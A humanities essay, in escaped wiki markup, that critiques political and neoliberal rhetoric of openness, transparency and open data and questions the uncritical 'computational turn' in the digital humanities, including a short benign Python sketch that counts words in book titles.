&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even if it was before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al, 2007: 27-28). Certainly, in the UK today, the 'truth is that the [UK] FOI Act [2000] isn't used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It's used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support the making of government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: for example, in the context of UK higher education, it is evident in the emphasis placed on measuring the impact of research on society and the economy, teaching standards, contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need to make difficult policy decisions about what data and what information it is right to publish online and what to keep secret at all. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes. 
In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million plus people who have purchased a Kindle, and helped the sale of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer - but not academic researchers or the public - to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply law enforcement agencies with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided the Google technology company with a host of network data and digital traces it can both monetize and give to the police as a result of having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google should seem somewhat farfetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don't ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking. 
(Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all pervasive it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today - and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic vehicle number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. ((Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy 'Climategate']controversy, in which climate skeptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists have tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency]– let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall,&amp;amp;nbsp;2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall,&amp;amp;nbsp;2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall,&amp;amp;nbsp;2011a: 142). To paraphrase a question from Lyotard I am going to return to at more length: Who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hilary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama government from condemning Wikileaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65&amp;amp;nbsp;% of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; But it is not just that Google’s algorithms are ranking some websites on the first page of its results and others on page 42 (which means, in effect, that the latter are rarely going to be accessed, since very few people read beyond the first page of Google’s results). It is that conventional search engines are reaching only an extremely small percentage of the total number of available web pages. Ten years ago Michael K. Bergman was already placing the figure at 0.03%, or [http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 ‘one in 3,000’], with ‘public information on the deep Web’ even then being ‘400 to 550 times larger than the commonly defined World Wide Web’. Consequently, while according to Bergman as much as ‘ninety-five per cent of the deep Web’ may be ‘publicly accessible information – not subject to fees or subscriptions’ – by far the vast majority of it is left untouched (Bergman, 2001). And that is before we even begin to address the issue of how the recent rise of the app, and use of the password protected Facebook for search purposes, may today be [http://www.wired.com/magazine/2010/08/ff_webrip/ annihilating the very idea of the openly searchable Web]. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We can therefore see that it is not enough simply to [http://www.freeourdata.org.uk/ ‘Free Our Data’], as the Guardian has it; or to operate on the basis that ‘information wants to be free’ (Wark, 2004) (although doing so of course may be a start, especially in an era when notions of the open web and net neutrality are under severe threat). We can put ever more research and data online; we can make it freely available to both other researchers and the public under open access, open data, open science and open government conditions; we can even integrate, index and link it using the appropriate metadata to enable it to be searched and harvested with relative ease. But none of this means this research and data is going to be found. Ideas of this kind ignore the fact that all information and data is ordered, structured, selected and framed in a particular way. This is what metadata is for, after all. Metadata is information or data that describes, links to, or is otherwise used to control, find, select, filter, classify and present other data. One example would be the information provided at the front of a book detailing its publisher, date and place of publication, ISBN number, and so on. However, the term ‘metadata’ is most commonly associated with the language of computing. There, metadata is what enables computers to access files and documents, not just in their own hard drives, but potentially across a range of different platforms, servers, websites and databases. Yet for all its associations with computer science, metadata is never neutral or objective. Although the term ‘data’ comes from the Latin word datum, meaning [http://www.collinslanguage.com/results.aspx?context=3&amp;amp;reversed=False&amp;amp;action=define&amp;amp;homonym=-1&amp;amp;text=datum ‘something given’], data is not simply objectively out there in the world already provided for us. The specific ways in which metadata is created, organized and presented helps to produce (rather than merely passively reflect) what is classified as data and information – and what is not. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Clearly, then, it is not just a question of free and open access to the research and data; nor of providing support, education and training on how to understand, interpret, use and apply it effectively, as [http://gurstein.wordpress.com/2010/09/02/open-data-empowering-the-empowered-or-effective-data-use-for-everyone/ Gurstein] has argued (2010). It is also a question of who (and what) makes decisions regarding the data and metadata, and thus gets to exercise control over it, and on what basis such decisions are made. To paraphrase Lyotard once more: who decides what data and metadata is, and who knows what needs to be decided?’ (1986: 9). Who gets to legislate? And who legitimates the legislators (1986: 8)? Will the ‘ruling class’ – top civil servants and consulting firms full of people with MBAs, ‘corporate leaders, high-level administrators, and the heads of the major professional, labor, political, and religious organizations’, including those behind Google, Apple, Facebook, Amazon, JISC, AHRC, OAI, SPARC, COASP – continue to operate as the class of interpreters, gatekeepers and ‘decision makers,’ not just with regard to having ‘access to the information these machines must have in storage to guarantee that the right decisions are made’, but with regard to creating and controlling the data and metadata, too (1986: 14)? 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''On Data-Intensive Scholarship''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; If, as demonstrated above, discourses of openness and transparency are themselves not very open or transparent at all, much of the current emphasis on making the research and data open and free is also lacking in self-reflectivity and meaningful critique. We can see this not just in those discourses associated with open access, open data, open science and open government that are explicitly emphasizing the importance of transparency, performativity and efficiency. This lack of criticality is apparent in much of what goes under the name of ‘digital humanities’, too, especially those elements associated with the ‘computational turn’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We tend to think of the humanities as being self-reflexive per se, and as frequently asking questions capable of troubling culture and society. Yet after decades when humanities scholarship made active use of a variety of critical theories – Marxist, psychoanalytic, post-colonialist, post-Marxist – it seems somewhat surprising that many advocates of this current turn to data-intensive scholarship in the humanities find it difficult to understand computing and the digital as much more than tools, techniques and resources. As a result, much of the scholarship that is currently occurring under the ‘digital humanities’ agenda is uncritical, naive and at times even banal ([http://liu.english.ucsb.edu/where-is-cultural-criticism-in-the-digital-humanities Liu], 2011; [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ Higgen], 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Witness the current emphasis on making the data not only visible but also visual. Stefanie Posavec’s frequently referred to [http://www.itsbeenreal.co.uk/index.php?/wwwords/literary-organism/ Literary Organism], which visualises the structure of Part One of Kerouac’s ''On the Road'' as a tree, provides one example; those cited earlier courtesy of Lev Manovich and the Software Studies Initiative offer another. Now, there is a long history of critical engagement within the humanities with ideas of the visual, the image, the spectacle, the spectator and so on: not just in critical theory, but also in cultural studies, women’s studies, media studies, film and television studies. Such a history of critical engagement stretches back to Guy Debord’s influential 1967 work, ''The Society of the Spectacle'', and beyond. For example, in his introduction to a 1995 book edited with Lynn Cooke, ''Visual Display: Culture Beyond Appearances'', Peter Wollen writes that an excess of visual display within culture has 'the effect of concealing the truth of the society that produces it, providing the viewer with an unending stream of images that might best be understood, not simply detached from a real world of things, as Debord implied, but as effacing any trace of the symbolic, condemning the viewer to a world in which we can see everything but understand nothing—allowing us viewer-victims, in Debord’s phrase, only &amp;quot;a random choice of ephemera&amp;quot;’ (1995: 9). It can come as something of a surprise, then, to discover that this humanities tradition in which ideas of the visual are engaged critically appears to have had comparatively little impact on the current enthusiasm for data visualisation that is so prominent an aspect of the turn toward data-intensive scholarship. 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Of course, this (at times explicit) repudiation of criticality could be precisely what makes certain aspects of the digital humanities so seductive for many at the moment. Exponents of the computational turn can be said to be endeavouring to avoid conforming to accepted (and often moralistic) conceptions of politics that have been decided in advance, including those that see it only in terms of power, ideology, race, gender, class, sexuality, ecology, affect etc. Refusing to [http://www.uchicago.edu/research/jnl-crit-inq/issues/v30/30n2.Latour.html ‘go through the motions of a critical avant-garde’], to borrow the words of Bruno Latour (2004), they often position themselves as responding to what is perceived as a fundamentally new cultural situation, and to the challenge it represents to our traditional methods of studying culture, by avoiding conventional theoretical manoeuvres and by experimenting with the development of fresh methods and approaches for the humanities instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Manovich, for instance, sees the sheer scale and dynamics of the contemporary new media landscape as presenting the usually accepted means of studying culture that were dominant for so much of the 20th century – the kinds of theories, concepts and methods appropriate to producing close readings of a relatively small number of texts – with a significant practical and conceptual challenge. In the past, ‘[http://lab.softwarestudies.com/2010/03/cultural-analytics-lecture-by-manovich.html cultural theorists and historians could generate theories and histories] based on small data sets (for instance, “classical Hollywood cinema”, “Italian Renaissance”, etc.). But how can we track “global digital cultures”, with their billions of cultural objects, and hundreds of millions of contributors?’, he asks (Manovich, 2010a). Three years ago Manovich was already describing the ‘numbers of people participating in social networks, sharing media, and creating user-generated content’ as simply ‘astonishing’: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.hpcwire.com/features/The_Next_Big_Thing_in_Humanities_Arts_and_Social_Science_Computing_Cultural_Analytics.html MySpace, for example,] claims 300 million users. Cyworld, a Korean site similar to MySpace, claims 90 percent of South Koreans in their 20s and 25 percent of that country's total population (as of 2006) use it. Hi5, a leading social media site in Central America, has 100 million users and Facebook, 14 million photo uploads daily. The number of new videos uploaded to YouTube every twenty-four hours (as of July 2006): 65,000. (Manovich in Franklin &amp;amp;amp; Rodriguez’G, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The solution Manovich proposes to this ‘data deluge’ is to turn to the very computers, databases, software and vast amounts of born-digital networked cultural content that are causing the problem in the first place, and to use them to help develop new methods and approaches adequate to the task at hand. This is where what he calls Cultural Analytics comes in. [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘The key idea of Cultural Analytics] is the use of computers to automatically analyze cultural artefacts in visual media, extracting large numbers of features that characterize their structure and content’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009); and what is more, to do so not just with regard to the culture of the past, but also with that of the present. To this end, Manovich (not unlike the Google technology company) calls for as much of culture as possible to be made available in external, digital form: [http://virtueelplatform.nl/kennis/analyzing-culture-in-the-21st-century/ ‘not only the exceptional but also the typical]; not only the few cultural sentences spoken by a few &amp;quot;great man&amp;quot; [sic] but the patterns in all cultural sentences spoken by everybody else’ (Manovich in Kerssens &amp;amp;amp; Dekker, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a series of posts on his Found History blog, Tom Scheinfeldt, managing director at the Center for History and New Media at George Mason University, positions such developments in terms of a shift from a concern with theory and ideology to a [http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ concern with methodology] (2008). In this respect there may well be a degree of [http://www.tannerhiggin.com/2010/05/cultural-politics-critique-and-the-digital-humanities/ ‘relief in having escaped the culture wars of the 1980s’] – for those in the US especially – as a result of this move ‘into the space of methodological work’ (Croxall, 2010) and what Scheinfeldt reportedly dubs [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘the post-theoretical age’] (cited in P. Cohen, 2010). The problem, though, is that without such reflexive critical thinking and theories many of those whose work forms part of this computational turn find it difficult to articulate exactly what the point of what they are doing is, as Scheinfeldt readily acknowledges (2010a). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Take one of the projects mentioned earlier: the attempt by [http://victorianbooks.org Dan Cohen and Fred Gibbs] to text-mine all the books published in English in the Victorian age (or at least those digitized by Google). Among other things, this allows Cohen and Gibbs to show that use of the word ‘revolution’ in book titles of the period spiked around [http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader ‘the French Revolution and the revolutions of 1848’] (D. Cohen, 2010). But what argument are they trying to make with this calculation? What is it we are able to learn as a result of this use of computational power on their part that we did not know already and could not have discovered without it ([http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/ Scheinfeldt], 2010a)?
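&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The calculation itself is, computationally speaking, disarmingly simple – which is partly the point. A minimal sketch of this kind of title-counting (the sample data below is invented, and this is not Cohen and Gibbs’s actual code or corpus): &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
&amp;lt;pre&amp;gt;
# A minimal sketch of the kind of counting behind the observation
# above: how often a word appears in book titles, year by year.
# The sample data is invented; this is not Cohen and Gibbs's code.
from collections import Counter

titles = [
    (1790, "Reflections on the Revolution in France"),
    (1848, "The Revolution in Europe"),
    (1851, "London Labour and the London Poor"),
]

counts = Counter(
    year for year, title in titles if "revolution" in title.lower()
)
for year in sorted(counts):
    print(year, counts[year])
&amp;lt;/pre&amp;gt;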
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In an explicit response to Cohen and Gibbs’s project, Scheinfeldt suggests that the problem of theory, or the lack of it, may actually be a question of scale: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader It expects something of the scale of humanities scholarship] which I’m not sure is true anymore: that a single scholar—nay, every scholar—working alone will, over the course of his or her lifetime ... make a fundamental theoretical advance to the field. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Increasingly, this expectation is something peculiar to the humanities. ...it required the work of a generation of mathematicians and observational astronomers, gainfully employed, to enable the eventual “discovery” of Neptune... Since the scientific revolution, most theoretical advances play out over generations, not single careers. (Scheinfeldt, 2010b)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Now, it is vitally important that we as scholars experiment with the new tools, methods and materials that digital media technologies create and make possible, in order to bring into play new forms of Foucauldian ''dispositifs'', or what Bernard Stiegler calls ''hypomnemata'', or what I am trying to think in terms of [http://garyhall.info media gifts]. I would include in this ‘experimentation imperative’ techniques and methodologies drawn from computer science and other related fields, such as information visualisation, data mining and so forth. Nevertheless, there is something troubling about this kind of deferral of critical and self-reflexive theoretical questions to an unknown point in time, still possibly a generation away. After all, the frequent suggestion is that now is not the right time to be making any such decision or judgement, since we cannot yet know how humanists will eventually come to use these tools and data, and thus what data-driven scholarship may or may not turn out to be capable of, critically, politically, theoretically. One of the consequences of this deferral, however, is that it makes it extremely difficult to judge whether this postponement is indeed acting as a responsible, political and ethical opening to the (heterogeneity and incalculability of the) future, including the future of the humanities; or whether it is serving as an alibi for a naive and rather superficial form of scholarship instead ([https://dhs.stanford.edu/the-digital-humanities-as/the-digital-humanities-as-imagined-community/ Meeks], 2010). It is, moreover, a form of scholarship that, in uncritically and un-self-reflexively adopting techniques and methodologies drawn from computer science, can be seen as part of the larger shift in contemporary society which Lyotard associates with the widespread use of computers and databases, and with the exteriorization of knowledge in relation to the ‘knower’. As we have seen, it is a movement away from a concern with ideals, with what is right and just and true, and toward a concern to legitimate power by optimizing the system’s performance in instrumental, functional terms. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; All of this raises some rather significant and timely questions for the humanities. Is it merely a coincidence that such a turn toward science, computing and data-intensive research is gaining momentum at a time when the UK government is emphasizing the importance of the STEM subjects (science, technology, engineering and mathematics) and withdrawing support and funding from the humanities? Or is one of the reasons all this is happening now that the humanities, like the sciences themselves, are under pressure from government, business, management, industry and increasingly the media to prove they provide value for money in instrumental, functional, performative terms? Is the interest in computing a strategic decision on the part of some of those in the humanities? As the project of Cohen and Gibbs shows, one can get funding from the likes of Google (D. Cohen, 2010). In fact, in the summer of 2010 [http://www.nytimes.com/2010/11/17/arts/17digital.html?_r=1&amp;amp;hp=&amp;amp;pagewanted=all ‘Google awarded $1 million to professors doing digital humanities research’] (P. Cohen, 2010).
To what extent is the take-up of practical techniques and approaches from computing science providing some areas of the humanities with a means of defending (and refreshing) themselves in an era of global economic crisis and severe cuts to higher education, through the transformation of their knowledge and learning into quantities of information – so-called ‘deliverables’? Can we even position the ‘computational turn’ as an event created to justify such a move on the part of certain elements within the humanities ([http://coventryuniversity.podbean.com/2010/11/09/open-software-and-digital-humanities-federica-frabetti/ Frabetti], 2010)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Where does all this leave us as far as this Living Book on open science is concerned? As the argument above hopefully demonstrates, it is clearly not enough just to attempt to reveal or recover the scientific truth about, say, the environment, to counter the disinformation of others involved in the likes of the Climategate controversy. Nor is it enough merely to make the scientific research openly accessible to the public. Equally, it is not satisfactory simply to make the information, data, and associated tools, techniques and resources freely available to those in the humanities, so they can collectively and collaboratively search, mine, map, graph, model, visualize, analyse and interpret it in new ways – including some that may make it less abstract and easier for the majority of those in society to understand and follow – and, in doing so, help bridge the gap between the ‘two cultures’. It is not so much that there is a lack of information, or access to the right kind of information, or information presented in the right kind of way to ensure that the message of the scientific research and data comes across effectively and efficiently. It is not even that there is too much information, too much white noise, as ‘Bifo’ et al call it (2009: 141-142). To be sure, as a [http://oxygen.mintel.com/sinatra/reports/display/id=479774 2010 Mintel report] showed – to stay with the example of climate change – most people in the UK already know what is happening to the environment. They are just suffering from Green Fatigue: bored with thinking about it, they are enacting a backlash against what they perceive as ‘extreme’ pressure from environmentalist groups. This is perhaps one reason why [http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html ‘the number of cars on UK roads has risen from just over 26 million in 2005 to more than 31 million in 2009’] (Shields, 2010: 30). Yet to argue there is too much information rather risks implying that there is a proper amount of information – and what would that be?&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; So we might not want to go along with Gilles Deleuze and Felix Guattari when they contend that ‘we do not lack communication. On the contrary, we have too much of it’. But we might nevertheless agree with them when they argue that what we actually lack is creation: ‘We lack resistance to the present’ (1994: 108). In this respect, it is not just a case of supplying more scientific research and data; nor of making the research and data that has otherwise been closed, hidden, denied or suppressed openly available for free – by opening the already existing memory and databanks to the people, for example (which is what Lyotard ended by suggesting we do).
It is also a case of creating work around the research and data that does not simply go along with the shift in the status and nature of knowledge that is currently taking place. As we have seen, it is a shift toward STEM subjects and away from the humanities; toward a concern with optimizing the social system’s performance in instrumental, functional terms, and away from a concern with questions of what is just and right; and toward an emphasis on openness, freedom and transparency, and away from what is capable of disrupting and disturbing society, and what, in remaining resistant to a culture of measurement and calculation, maintains a much needed element of inaccessibility, inefficiency, delay, error, antagonism, heterogeneity and dissensus within the system. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Can this Living Book on open science be considered one such creation? And can this series of Living Books about Life be considered another? Are they instances of a resistance to the present? Or just more white noise? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; (The above is based on a paper presented at Data Landscapes, an AHRC network event held in conjunction with the British Antarctic Survey at the University of Westminster, London, December 15, 2010. An earlier version of some of the material provided above appeared in Hall [2010].) &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''References''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Arthur, C. (2010), ‘Will Brussels Curb Google Guys’, ''The Guardian'', December 6. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; 'Bifo' Berardi, F., Jacquemet, M. and Vitali, G. (2009), ''Ethereal Shadows: Communications and Power in Contemporary Italy''. Brooklyn, New York: Autonomedia. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Bergman, M. K. (2001), ‘The Deep Web: Surfacing Hidden Value’, ''JEP: The Journal of Electronic Publishing'', vol.7, no.1, August. 